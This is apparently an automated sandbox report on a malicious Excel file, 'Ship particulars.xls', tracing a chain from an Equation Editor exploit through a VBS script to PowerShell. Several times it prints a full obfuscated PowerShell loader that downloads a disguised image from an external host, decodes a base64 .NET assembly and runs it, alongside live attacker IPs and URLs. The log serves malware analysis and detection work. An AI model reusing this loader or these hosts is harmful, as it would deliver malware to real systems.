    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C22A3A6.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /sWel7 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hop.fyiConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /33144/ee/uh.uh.uhuhuh.uu.uh.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /33144/creatingfollowerswithflowereseverytime.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Users_API/syscore/file_ygeik543.xh0.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 91.92.254.29
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: hop.fyi
    Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
    Source: EQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gif
    Source: EQNEDT32.EXE, 00000009.00000002.416768338.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifM
    Source: EQNEDT32.EXE, 00000009.00000002.417220147.00000000035B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.139/33144/creatingfollowerswithflowereseverytime.gifj
    Source: wscript.exe, 0000000A.00000002.431883950.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431709311.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431533301.0000000000546000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.431803798.0000000000548000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.000000000055A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431579559.000000000051D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.431300484.0000000000546000.00000004.00000020.00020000.00000000.sdmp, creatingfollowerswithflowereseverytime[1].gif.9.dr, creatingfollowerswithflowerese.vBS.9.drString found in binary or memory: http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: hop.fyi.url.3.drString found in binary or memory: http://hop.fyi/
    Source: Ship particulars.xls, sWel7.url.3.drString found in binary or memory: http://hop.fyi/sWel7
    Source: 92530000.0.dr, ~DF8FA74BFE73643F78.TMP.0.drString found in binary or memory: http://hop.fyi/sWel7yX
    Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000C.00000002.429913988.0000000002E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uploaddeimagens.com.br
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000C.00000002.430713228.0000000003399000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: powershell.exe, 0000000C.00000002.429913988.0000000002E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
    Source: powershell.exe, 0000000C.00000002.429760140.0000000000700000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/i
    Source: powershell.exe, 0000000C.00000002.431058539.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
    Source: powershell.exe, 0000000C.00000002.429913988.00000000024A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;
    Source: powershell.exe, 0000000C.00000002.429913988.00000000029DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p
    Source: powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: powershell.exe, 0000000C.00000002.429913988.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.429913988.0000000002EFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
    Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

    System Summary

    barindex
    Source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
    Source: Ship particulars.xlsOLE: Microsoft Excel 2007+
    Source: Ship particulars.xlsOLE: Microsoft Excel 2007+
    Source: ~DF669CF6B4D81DE92B.TMP.0.drOLE: Microsoft Excel 2007+
    Source: ~DFA3F86C325C272D08.TMP.0.drOLE: Microsoft Excel 2007+
    Source: 92530000.0.drOLE: Microsoft Excel 2007+
    Source: 92530000.0.drOLE: Microsoft Excel 2007+
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sWel7.urlJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\hop.fyi.urlJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
    Source: Ship particulars.xlsOLE indicator, VBA macros: true
    Source: Ship particulars.xlsStream path 'MBD0026D145/\x1Ole' : http://hop.fyi/sWel7Oa~_q%Yw!G7j&F|ZJI}BrKgJ"&s+j1pL-ER|Lj#EFb<kHhdsd$;{aI@;/*cPe%"vstTh6cJbYmbO7DHAlcpX7qKKqrqxYaqxLewLAFBEdsLm8PNMPlG7cCAUmRGOO2ylgsQYSFVqScSTyFbrUgiNBHK7hzTJOzwb3PW3KYHww1hYRyxjl1NEAs1DopTZpESd6ODn7qx4UZPd1ej-T1.V=6P"&~^,
    Source: ~DF669CF6B4D81DE92B.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DFA3F86C325C272D08.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/34@13/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\92530000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7261.tmpJump to behavior
    Source: Ship particulars.xlsOLE indicator, Workbook stream: true
    Source: 92530000.0.drOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Ship particulars.xlsReversingLabs: Detection: 21%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
